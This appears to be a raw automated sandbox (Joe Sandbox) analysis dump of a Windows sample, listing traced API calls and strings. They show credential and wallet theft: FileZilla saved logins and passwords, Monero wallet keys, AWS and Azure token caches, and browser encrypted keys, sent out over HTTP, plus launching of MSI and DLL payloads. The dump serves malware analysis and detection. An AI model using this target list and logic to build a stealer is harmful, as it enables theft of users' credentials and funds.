                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F03DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 002F0419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F0427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 002F0463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F0475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F0502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F0532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 002F0562
                  • lstrcat.KERNEL32(?,profile: null), ref: 002F0571
                  • lstrcat.KERNEL32(?,url: ), ref: 002F0580
                  • lstrcat.KERNEL32(?,00000000), ref: 002F0593
                  • lstrcat.KERNEL32(?,00301678), ref: 002F05A2
                  • lstrcat.KERNEL32(?,00000000), ref: 002F05B5
                  • lstrcat.KERNEL32(?,0030167C), ref: 002F05C4
                  • lstrcat.KERNEL32(?,login: ), ref: 002F05D3
                  • lstrcat.KERNEL32(?,00000000), ref: 002F05E6
                  • lstrcat.KERNEL32(?,00301688), ref: 002F05F5
                  • lstrcat.KERNEL32(?,password: ), ref: 002F0604
                  • lstrcat.KERNEL32(?,00000000), ref: 002F0617
                  • lstrcat.KERNEL32(?,00301698), ref: 002F0626
                  • lstrcat.KERNEL32(?,0030169C), ref: 002F0635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: a31b81b34e3ccef91c3e7b5dee0b9f0591bfa2c7e4c6df6ec6373168e30c116a
                  • Instruction ID: 106e637ead24e53241aca2a87bb1cf8f3add7b112455f5c5dc59c16a5d7dcb9c
                  • Opcode Fuzzy Hash: a31b81b34e3ccef91c3e7b5dee0b9f0591bfa2c7e4c6df6ec6373168e30c116a
                  • Instruction Fuzzy Hash: DDD133B192010C9BCB14EBF0DD96EFEB378EF14740F444528F606A6095DE74AA1ADF61
                  APIs
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002E4839
                    • Part of subcall function 002E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002E4849
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002E59F8
                  • StrCmpCA.SHLWAPI(?,0132F360), ref: 002E5A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002E5B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0132F2C0,00000000,?,01329D38,00000000,?,00301A1C), ref: 002E5E71
                  • lstrlen.KERNEL32(00000000), ref: 002E5E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 002E5E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002E5E9A
                  • lstrlen.KERNEL32(00000000), ref: 002E5EAF
                  • lstrlen.KERNEL32(00000000), ref: 002E5ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002E5EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 002E5F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002E5F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 002E5F4C
                  • InternetCloseHandle.WININET(00000000), ref: 002E5FB0
                  • InternetCloseHandle.WININET(00000000), ref: 002E5FBD
                  • HttpOpenRequestA.WININET(00000000,0132F2D0,?,0132EB40,00000000,00000000,00400100,00000000), ref: 002E5BF8
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                  • InternetCloseHandle.WININET(00000000), ref: 002E5FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: 2b81780ef70ca60673b592d3e6d88a3502f6ce017944c6ead70c3cb4ceaa9248
                  • Instruction ID: 811be92fbd1f191f73de2396788977f8f19ad70c1c974a3dee7d091f070542bb
                  • Opcode Fuzzy Hash: 2b81780ef70ca60673b592d3e6d88a3502f6ce017944c6ead70c3cb4ceaa9248
                  • Instruction Fuzzy Hash: 9E12CDB183111CABDB15EBA0DC96FEEB378BF14780F504179B20A62091DF706A5ACF65
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002F8B60: GetSystemTime.KERNEL32(00300E1A,01329C18,003005AE,?,?,002E13F9,?,0000001A,00300E1A,00000000,?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002F8B86
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002ECF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002ED0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002ED0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED208
                  • lstrcat.KERNEL32(?,00301478), ref: 002ED217
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED22A
                  • lstrcat.KERNEL32(?,0030147C), ref: 002ED239
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED24C
                  • lstrcat.KERNEL32(?,00301480), ref: 002ED25B
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED26E
                  • lstrcat.KERNEL32(?,00301484), ref: 002ED27D
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED290
                  • lstrcat.KERNEL32(?,00301488), ref: 002ED29F
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED2B2
                  • lstrcat.KERNEL32(?,0030148C), ref: 002ED2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED2D4
                  • lstrcat.KERNEL32(?,00301490), ref: 002ED2E3
                    • Part of subcall function 002FA820: lstrlen.KERNEL32(002E4F05,?,?,002E4F05,00300DDE), ref: 002FA82B
                    • Part of subcall function 002FA820: lstrcpy.KERNEL32(00300DDE,00000000), ref: 002FA885
                  • lstrlen.KERNEL32(?), ref: 002ED32A
                  • lstrlen.KERNEL32(?), ref: 002ED339
                    • Part of subcall function 002FAA70: StrCmpCA.SHLWAPI(013287F0,002EA7A7,?,002EA7A7,013287F0), ref: 002FAA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 002ED3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 2b50b3adf582d277e0d5006e59a04b7749597dbe33a6986336d813b48af821ec
                  • Instruction ID: 2566738a2994d1a1b63e644f2e8f95ca22037394ca2199b268c694c582bbf6fc
                  • Opcode Fuzzy Hash: 2b50b3adf582d277e0d5006e59a04b7749597dbe33a6986336d813b48af821ec
                  • Instruction Fuzzy Hash: E6E124B19201089BCB14EBA0DD96EFEB378AF14740F504164F60BB6091DF75AE1ADF62
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0132DE48,00000000,?,0030144C,00000000,?,?), ref: 002ECA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 002ECA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 002ECA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002ECAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 002ECAD9
                  • StrStrA.SHLWAPI(?,0132DF08,00300B52), ref: 002ECAF7
                  • StrStrA.SHLWAPI(00000000,0132DF68), ref: 002ECB1E
                  • StrStrA.SHLWAPI(?,0132E5D8,00000000,?,00301458,00000000,?,00000000,00000000,?,01328940,00000000,?,00301454,00000000,?), ref: 002ECCA2
                  • StrStrA.SHLWAPI(00000000,0132E6F8), ref: 002ECCB9
                    • Part of subcall function 002EC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 002EC871
                    • Part of subcall function 002EC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 002EC87C
                  • StrStrA.SHLWAPI(?,0132E6F8,00000000,?,0030145C,00000000,?,00000000,013289E0), ref: 002ECD5A
                  • StrStrA.SHLWAPI(00000000,01328A80), ref: 002ECD71
                    • Part of subcall function 002EC820: lstrcat.KERNEL32(?,00300B46), ref: 002EC943
                    • Part of subcall function 002EC820: lstrcat.KERNEL32(?,00300B47), ref: 002EC957
                    • Part of subcall function 002EC820: lstrcat.KERNEL32(?,00300B4E), ref: 002EC978
                  • lstrlen.KERNEL32(00000000), ref: 002ECE44
                  • CloseHandle.KERNEL32(00000000), ref: 002ECE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 66b980041c62001bad3d428fca6cb77b1129e3ad9ce18d0edac821c3c2331617
                  • Instruction ID: 7679a7bf907a3c85f187d9a2dddd6742056371b377eb43b80fd8962b7b10e521
                  • Opcode Fuzzy Hash: 66b980041c62001bad3d428fca6cb77b1129e3ad9ce18d0edac821c3c2331617
                  • Instruction Fuzzy Hash: 4CE100B182010CABDB15EBA0DC92FFEB778AF14380F404179F20A66191DF706A5ACF61
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • RegOpenKeyExA.ADVAPI32(00000000,0132AC80,00000000,00020019,00000000,003005B6), ref: 002F83A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 002F8426
                  • wsprintfA.USER32 ref: 002F8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 002F847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F8499
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 6dc6ad9d155f412ea09dfcc7260b956466d3a146dfa2e6eb3220e12a0c6a8db8
                  • Instruction ID: a4e86a9f4c649bcfe68105d3ba826a2f55b6c031f5ec7c43666e17c69b751ed6
                  • Opcode Fuzzy Hash: 6dc6ad9d155f412ea09dfcc7260b956466d3a146dfa2e6eb3220e12a0c6a8db8
                  • Instruction Fuzzy Hash: 938110B192111C9BDB24DF50CC91FEAB7B8FF18740F0082A8E209A6150DF716B8ACF95
                  APIs
                    • Part of subcall function 002F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002F8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002F4DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 002F4DCD
                    • Part of subcall function 002F4910: wsprintfA.USER32 ref: 002F492C
                    • Part of subcall function 002F4910: FindFirstFileA.KERNEL32(?,?), ref: 002F4943
                  • lstrcat.KERNEL32(?,00000000), ref: 002F4E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 002F4E59
                    • Part of subcall function 002F4910: StrCmpCA.SHLWAPI(?,00300FDC), ref: 002F4971
                    • Part of subcall function 002F4910: StrCmpCA.SHLWAPI(?,00300FE0), ref: 002F4987
                    • Part of subcall function 002F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 002F4B7D
                    • Part of subcall function 002F4910: FindClose.KERNEL32(000000FF), ref: 002F4B92
                  • lstrcat.KERNEL32(?,00000000), ref: 002F4EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 002F4EE5
                    • Part of subcall function 002F4910: wsprintfA.USER32 ref: 002F49B0
                    • Part of subcall function 002F4910: StrCmpCA.SHLWAPI(?,003008D2), ref: 002F49C5
                    • Part of subcall function 002F4910: wsprintfA.USER32 ref: 002F49E2
                    • Part of subcall function 002F4910: PathMatchSpecA.SHLWAPI(?,?), ref: 002F4A1E
                    • Part of subcall function 002F4910: lstrcat.KERNEL32(?,0132F270), ref: 002F4A4A
                    • Part of subcall function 002F4910: lstrcat.KERNEL32(?,00300FF8), ref: 002F4A5C
                    • Part of subcall function 002F4910: lstrcat.KERNEL32(?,?), ref: 002F4A70
                    • Part of subcall function 002F4910: lstrcat.KERNEL32(?,00300FFC), ref: 002F4A82
                    • Part of subcall function 002F4910: lstrcat.KERNEL32(?,?), ref: 002F4A96
                    • Part of subcall function 002F4910: CopyFileA.KERNEL32(?,?,00000001), ref: 002F4AAC
                    • Part of subcall function 002F4910: DeleteFileA.KERNEL32(?), ref: 002F4B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: ca0bb1a56fb8f63b282d476e565a26a18934dd298fb5db736a860f36a1efd626
                  • Instruction ID: 8313d594a26fc665f3e5a1cc9444c6f5ac6b6b4b8bff45941ffe474c2d7c2294
                  • Opcode Fuzzy Hash: ca0bb1a56fb8f63b282d476e565a26a18934dd298fb5db736a860f36a1efd626
                  • Instruction Fuzzy Hash: 5F4194BA95020867DB24F770DC57FED7338AB64740F4045A4F289660C1EEB45BD98F92
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 002F906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: a4029b87406ea584dada2ee2d3cb92c317c813ba0eab4b54867742199fe15d71
                  • Instruction ID: dec4906ff5ed8cc6bf79caa017d763a7e5ff2bcae7b68171584895f4c1a47e91
                  • Opcode Fuzzy Hash: a4029b87406ea584dada2ee2d3cb92c317c813ba0eab4b54867742199fe15d71
                  • Instruction Fuzzy Hash: 26710AB1910208ABDB14EFE4DC89FEEB7B8BF58300F508118F615A7290DB74A955DB61
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002F31C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002F335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002F34EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 88aa4ddf36b6a3776d4da8ed63d9a7fb31e9e40f040d46a50eceed5191bb6db3
                  • Instruction ID: 107324ed13f76d985825933ce2d90a1310142aac628090c97bb0632df783779c
                  • Opcode Fuzzy Hash: 88aa4ddf36b6a3776d4da8ed63d9a7fb31e9e40f040d46a50eceed5191bb6db3
                  • Instruction Fuzzy Hash: B3120FB182010C9ADB19EBA0CC92FFDF778AF14380F504179E60A66195EF742B5ACF52
                  APIs
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E6280: InternetOpenA.WININET(00300DFE,00000001,00000000,00000000,00000000), ref: 002E62E1
                    • Part of subcall function 002E6280: StrCmpCA.SHLWAPI(?,0132F360), ref: 002E6303
                    • Part of subcall function 002E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002E6335
                    • Part of subcall function 002E6280: HttpOpenRequestA.WININET(00000000,GET,?,0132EB40,00000000,00000000,00400100,00000000), ref: 002E6385
                    • Part of subcall function 002E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002E63BF
                    • Part of subcall function 002E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002E63D1
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002F5318
                  • lstrlen.KERNEL32(00000000), ref: 002F532F
                    • Part of subcall function 002F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002F8E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 002F5364
                  • lstrlen.KERNEL32(00000000), ref: 002F5383
                  • lstrlen.KERNEL32(00000000), ref: 002F53AE
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: d89b19ea53d8a842dc2051148c96022fde9a0affe755590a8abef676d2453ed4
                  • Instruction ID: 20ac10c95ed5cabac44d7906b241057a5d13125b5d503189ea06af83c47a1869
                  • Opcode Fuzzy Hash: d89b19ea53d8a842dc2051148c96022fde9a0affe755590a8abef676d2453ed4
                  • Instruction Fuzzy Hash: 70511DB093014D9BCB14FF60C992AFDB778AF10380F908134EA0A5A591DF746B6ACF52
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 1e1c983a2feae8a03248e96409073e518631fa82069bd3cddb9d7bbe0926aba9
                  • Instruction ID: 6c25ad14cddf3ee05e86fe6cc6afdd7f6f1c8a5403fb72e0dcb5eee36f83515b
                  • Opcode Fuzzy Hash: 1e1c983a2feae8a03248e96409073e518631fa82069bd3cddb9d7bbe0926aba9
                  • Instruction Fuzzy Hash: 94C175B591011D9BCB14EF60DC89FFAB378BF64344F0045A8F60AA7241DB70AAA5DF91
                  APIs
                    • Part of subcall function 002F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002F8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002F42EC
                  • lstrcat.KERNEL32(?,0132ED20), ref: 002F430B
                  • lstrcat.KERNEL32(?,?), ref: 002F431F
                  • lstrcat.KERNEL32(?,0132DED8), ref: 002F4333
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002F8D90: GetFileAttributesA.KERNEL32(00000000,?,002E1B54,?,?,0030564C,?,?,00300E1F), ref: 002F8D9F
                    • Part of subcall function 002E9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 002E9D39
                    • Part of subcall function 002E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E99EC
                    • Part of subcall function 002E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002E9A11
                    • Part of subcall function 002E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002E9A31
                    • Part of subcall function 002E99C0: ReadFile.KERNEL32(000000FF,?,00000000,002E148F,00000000), ref: 002E9A5A
                    • Part of subcall function 002E99C0: LocalFree.KERNEL32(002E148F), ref: 002E9A90
                    • Part of subcall function 002E99C0: CloseHandle.KERNEL32(000000FF), ref: 002E9A9A
                    • Part of subcall function 002F93C0: GlobalAlloc.KERNEL32(00000000,002F43DD,002F43DD), ref: 002F93D3
                  • StrStrA.SHLWAPI(?,0132EC00), ref: 002F43F3
                  • GlobalFree.KERNEL32(?), ref: 002F4512
                    • Part of subcall function 002E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N.,00000000,00000000), ref: 002E9AEF
                    • Part of subcall function 002E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,002E4EEE,00000000,?), ref: 002E9B01
                    • Part of subcall function 002E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N.,00000000,00000000), ref: 002E9B2A
